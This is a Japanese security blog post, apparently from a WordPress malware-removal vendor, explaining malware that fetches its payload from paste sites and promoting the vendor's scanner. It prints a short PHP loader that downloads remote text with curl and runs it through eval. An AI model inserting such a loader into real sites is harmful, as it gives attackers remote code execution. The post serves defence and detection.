ワードプレスでテキストコピペサービスを利用するマルウェアについて解説いたします。
テキストコピペサービスとは?
テキストコピペサービスとは、テキストをオンラインで張り付けて保存しておけるサービスです。
もっとも有名なサービスは PATEBINかと思いますが、その他にもマイナーなテキストコピペサービスが多数ございます。
テキストコピペサービスを利用したマルウェアの例
このテキストコピペーサービスを利用したマルウェアのコードの例は下記のようになります。
$url = "https://paste.ee/テキストのURL";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval("?>".$result);
このマルウェアは、テキストコピペサービスによって、保存されているマルウェア本体を読み込んでeval関数(テキストをPHPコードとして実行できる関数)で実行します。
このマルウェアの恐ろしい所は、マルウェア本体がサーバー上ではなくハッカーが好きなように編集できる遠隔のコピペサービス上に保存されているという事です。
この為、ハッカーは不正なコードを書き換えて好きなようにサーバー内でハッキング活動ができることになります。データベースを書き換えたり、不正なファイルを新たに作成したり、コンテンツを書き換えたり、正規ファイルを改ざんしたりなど、PHPプログラムでできるあらゆることが、サーバー上で実行可能となってしまいます。
テキストコピペサービスを利用したマルウェアの検出と駆除
このタイプのマルウェアも当社で開発したマルウェア検査駆除プログラムで検出や駆除が可能です。
【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
また、プラグインの機械的な検査には新規性の高いマルウェアに対しては限界がある面もございます。駆除の方法が分からなかったり、駆除しきれていない不安がある場合や、再感染が繰り返される場合は専門家による駆除をご依頼いただくことをお勧めいたします。
